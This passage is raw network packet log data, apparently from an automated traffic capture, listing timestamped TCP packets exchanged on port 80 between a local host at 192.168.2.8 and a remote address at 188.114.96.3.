                                Aug 27, 2024 09:49:37.833707094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833719969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833734035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833755970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833787918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833861113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.913800001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913842916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913871050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913885117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913897991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913908958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913965940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.913979053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.914033890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.914073944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.915484905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915617943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915628910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915667057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.915735960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915775061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915781975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.915870905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.915940046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916002035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916012049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916023970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916047096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916047096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916071892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916220903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916233063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916244030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916258097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916270971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916275024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916275978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916285992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916292906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916301012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916363001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916383028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916393995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916404963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916416883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916421890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916428089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916445971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916467905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916512966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916524887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916534901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916548014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916553020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916558981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916563988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.916573048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.916626930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.917531967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917582989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917584896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.917701006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917712927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917723894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917736053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917749882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.917773962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.917917967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917928934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917939901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917951107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.917958021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.917979956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918097973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918109894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918119907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918131113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918138027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918149948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918206930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918232918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918268919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918283939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918312073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918343067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918354034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918364048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.918389082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918405056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.918422937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919136047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919148922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919159889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919188023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919205904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919290066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919301987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919312000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919325113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919336081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919337988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919347048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919359922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919378996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919389963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919399977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919409037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919411898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919425011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919437885 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919440985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919452906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919465065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919472933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919476986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919493914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919517040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919548988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919562101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919615984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919693947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919707060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919717073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919754982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919768095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919775963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919780016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919790983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919802904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.919806004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919821024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919841051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.919991016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920049906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920063019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920093060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920180082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920191050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920202017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920216084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920227051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920238972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920253038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920264959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920281887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920294046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920305014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920308113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920330048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920341015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920344114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920352936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920387983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920442104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920453072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920526981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920589924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920600891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920643091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920727015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920737982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920747995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920762062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920773983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920773983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920850039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920861006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920871973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920902967 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920917988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920929909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920942068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920953989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.920958996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.920983076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.961122990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.011542082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012306929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012317896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012334108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012346029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012351990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012357950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012368917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012377024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012381077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012392044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012403011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012439013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012449980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012460947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012471914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012474060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012490034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012499094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012522936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012538910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012579918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012590885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012603045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012620926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012624979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012631893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012648106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012659073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012666941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012670040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012682915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012686968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012695074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012706995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.012713909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.012732983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013133049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013144970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013154984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013166904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013185978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013226032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013264894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013324022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013335943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013345957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013356924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013370037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013381004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013392925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013405085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013416052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013427973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013438940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013438940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013467073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013472080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013478041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013488054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013499975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013509989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013511896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013523102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013534069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013534069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013547897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013618946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013634920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013652086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013653040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013663054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013674021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013685942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013688087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013695955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013704062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013706923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013717890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013720036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013729095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013741016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.013758898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.013782978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014072895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014084101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014092922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014103889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014115095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014163017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014187098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014224052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014235020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014245033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014257908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014266014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014314890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014409065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014420033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014430046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014441967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014452934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014457941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014465094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014476061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014486074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014487982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014498949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014509916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014528036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014655113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014666080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014676094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014709949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014734030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014822006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014844894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014856100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014867067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014878035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014887094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014889002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014899015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014909983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014911890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014923096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014925957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014933109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014945030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014950037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014955997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014966011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014975071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.014976978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014987946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.014997959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015010118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015022993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015044928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015372038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015391111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015403986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015415907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015423059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015425920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015436888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015450954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015454054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015465975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015466928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015477896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015489101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015501022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015512943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015525103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.015526056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015561104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.015561104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.097871065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097887039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097898006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097950935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097963095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097970009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.097984076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098058939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098131895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098176956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098540068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098551035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098562002 CEST8049715188.114.96.3192.168.2.8
